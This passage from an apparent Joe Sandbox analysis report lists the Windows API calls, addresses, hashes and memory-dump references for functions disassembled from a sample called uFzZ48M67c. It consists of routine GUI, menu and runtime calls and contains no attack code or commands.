                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                          • String ID:
                                          • API String ID: 3691411573-0
                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                          APIs
                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                          • EndPath.GDI32(?), ref: 004472D6
                                          • StrokePath.GDI32(?), ref: 004472E4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                          • String ID:
                                          • API String ID: 372113273-0
                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                          APIs
                                          • __getptd.LIBCMT ref: 0041708E
                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                          • __amsg_exit.LIBCMT ref: 004170AE
                                          • __lock.LIBCMT ref: 004170BE
                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                          • _free.LIBCMT ref: 004170EE
                                          • InterlockedIncrement.KERNEL32(009D2CE0), ref: 00417106
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                          • String ID:
                                          • API String ID: 3470314060-0
                                          • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                          • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                          APIs
                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                          • String ID:
                                          • API String ID: 3495660284-0
                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                          APIs
                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Virtual
                                          • String ID:
                                          • API String ID: 4278518827-0
                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                          • ExitThread.KERNEL32 ref: 004151ED
                                          • __freefls@4.LIBCMT ref: 00415209
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                          • String ID:
                                          • API String ID: 442100245-0
                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                          APIs
                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                          • _wcslen.LIBCMT ref: 0045F94A
                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                          • String ID: 0
                                          • API String ID: 621800784-4108050209
                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                          • String ID: \VH
                                          • API String ID: 3884216118-234962358
                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                          APIs
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                          • IsMenu.USER32(?), ref: 0044854D
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                          • DrawMenuBar.USER32 ref: 004485AF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$Item$DrawInfoInsert
                                          • String ID: 0
                                          • API String ID: 3076010158-4108050209
                                          • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                          • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                          • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                          • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                          • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$_memmove_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1589278365-1403004172
                                          • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                          • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                          • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                          • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Handle
                                          • String ID: nul
                                          • API String ID: 2519475695-2873401336
                                          • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                          • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                          • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                          • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Handle
                                          • String ID: nul
                                          • API String ID: 2519475695-2873401336
                                          • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                          • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                          • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                          • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: SysAnimate32
                                          • API String ID: 0-1011021900
                                          • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                          • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                          • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                          • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                          APIs
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                            • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                            • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                            • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                            • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                          • GetFocus.USER32 ref: 0046157B
                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                            • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                          • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                          • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                          • __swprintf.LIBCMT ref: 00461608
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                          • String ID: %s%d
                                          • API String ID: 2645982514-1110647743
                                          • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                          • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
